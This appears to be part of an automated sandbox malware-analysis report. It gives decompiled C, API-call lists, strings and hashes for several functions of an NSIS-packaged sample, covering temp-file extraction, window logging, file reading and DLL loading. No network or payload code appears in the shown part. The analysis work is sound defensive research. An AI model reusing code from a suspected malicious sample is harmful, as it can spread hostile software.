MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033EE
wsprintfW.USER32 ref: 00403401

Strings

... %d%%, xrefs: 004033FB
}8@, xrefs: 004032B4
A, xrefs: 0040347E
*B, xrefs: 004032DF
A, xrefs: 00403374

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: *B$ A$ A$... %d%%$}8@
API String ID: 551687249-3029848762
Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E83( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405E0C(E0040653D(_t81, L"C:\\Users\\Arthur\\AppData\\Local\\Temp")), ??);
				} else {
					E0040653D();
				}
				E004067C4(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406873(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406008(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E0040559F(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x434f88;
						goto L32;
					} else {
						E0040653D("C:\Users\Arthur\AppData\Local\Temp\nsd7AB8.tmp", _t83);
						E0040653D(_t83, _t81);
						E0040657A(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nsd7AB8.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040653D(_t83, "C:\Users\Arthur\AppData\Local\Temp\nsd7AB8.tmp");
						_t64 = E00405B9D("C:\Users\Arthur\AppData\Local\Temp\nsd7AB8.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E0040559F();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E0040559F(0xffffffea,  *(_t86 - 8)); // executed
				 *0x434fb4 =  *0x434fb4 + 1;
				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x434fb4 =  *0x434fb4 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B9D();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x0040292e
0x0040292e
0x00402c2a
0x00402c2d
0x00402c2d
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402c33
0x00402c33
0x00402c33
0x00401867
0x00401867
0x00401868
0x00401493
0x0040239d
0x0040239d
0x0040239d
0x00401865
0x0040185e
0x00402c35
0x00402c39
0x00402c39
0x00401892
0x00401897
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x00402398
0x00000000
0x00402398
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A

Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,00000000,004231B5,758D23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,00000000,004231B5,758D23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 0040179E
C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll, xrefs: 00401835, 00401851
Call, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp, xrefs: 00401821, 0040183F

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp$C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll$Call
API String ID: 1941528284-3522010162
Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D

Uniqueness

Uniqueness Score: -1.00%

Function 0040559F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040559F(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x433ee4; // 0x103e2
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x434fb4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
					}
					_t27 = lstrlenW(0x42c248);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42c248;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x42c248[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x42c248, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004055a5
0x004055af
0x004055b4
0x004055ba
0x004055c5
0x004055c8
0x004055cb
0x004055d1
0x004055d1
0x004055d7
0x004055df
0x004055e2
0x004055ff
0x00405603
0x0040560c
0x0040560c
0x00405616
0x0040561f
0x0040562b
0x00405632
0x00405636
0x00405639
0x0040564c
0x0040565a
0x0040565a
0x0040565e
0x00405660
0x00405663
0x00000000
0x00405663
0x004055e4
0x004055ec
0x004055f4
0x004055fa
0x00000000
0x004055fa
0x004055f4
0x004055e2
0x0040566f

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,00000000,004231B5,758D23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,00000000,004231B5,758D23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,00403418), ref: 004055FA
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll), ref: 0040560C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,00000000), ref: 00406779

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll, xrefs: 004055C0, 004055D0, 004055D6, 004055F9, 00405605

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll
API String ID: 1495540970-1986396210
Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														__eax = SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1); // executed
														__ebp - 0x50 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004026ec
0x004026ee
0x004026f1
0x004026f3
0x004026f6
0x004026fb
0x004026ff
0x00402702
0x00402705
0x00402c2a
0x00402c2d
0x0040270b
0x0040270b
0x00402712
0x00402714
0x00402714
0x0040271a
0x0040287e
0x0040287e
0x00402881
0x00402886
0x004015b6
0x0040292e
0x0040292e
0x00000000
0x00402720
0x00402721
0x0040272c
0x0040272f
0x0040273b
0x0040273f
0x004027d7
0x004027ef
0x004027ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402745
0x00402745
0x00402748
0x00402749
0x0040274c
0x00402751
0x00402758
0x00402760
0x00000000
0x00402766
0x00402766
0x0040276b
0x00000000
0x00402771
0x00402771
0x00402779
0x0040277c
0x0040277f
0x0040283a
0x00402841
0x00402785
0x0040278b
0x00402797
0x00402801
0x00402801
0x00402799
0x00402799
0x0040279c
0x0040279e
0x0040279e
0x0040279e
0x004027a1
0x004027a6
0x004027a9
0x00000000
0x00000000
0x004027ab
0x004027ae
0x004027b6
0x004027c2
0x004027d0
0x00000000
0x004027d2
0x00000000
0x004027d2
0x00000000
0x004027d0
0x0040279e
0x00402804
0x00402807
0x00000000
0x00402809
0x0040280e
0x0040284f
0x00402871
0x00402878
0x0040285d
0x0040285d
0x00402860
0x00402863
0x00402866
0x00402866
0x00000000
0x00402817
0x00402817
0x0040281a
0x0040281d
0x00402823
0x00402827
0x0040282a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040282a
0x0040280e
0x00402807
0x0040277f
0x0040276b
0x00402760
0x00000000
0x0040282c
0x0040282c
0x0040282f
0x00402838
0x00000000
0x0040272f
0x0040271a
0x00402c33
0x00402c39

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040689A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040689A(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004068b1
0x004068ba
0x004068bc
0x004068bc
0x004068c0
0x004068d3
0x004068cd
0x004068cd
0x004068cd
0x004068ec
0x00406900
0x00406907

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
wsprintfW.USER32 ref: 004068EC
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900

Strings

UXTHEME, xrefs: 004068A3
%s%S.dll, xrefs: 004068E6
\, xrefs: 004068C2

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405A6E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405A6E(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405a79
0x00405a7d
0x00405a80
0x00405a86
0x00405a8a
0x00405a8e
0x00405a96
0x00405a9d
0x00405aa3
0x00405aaa
0x00405ab1
0x00405ab9
0x00405abb
0x00000000
0x00405abb
0x00405ac5
0x00405acc
0x00405ae2
0x00000000
0x00000000
0x00000000
0x00405ae4
0x00405ae8

APIs

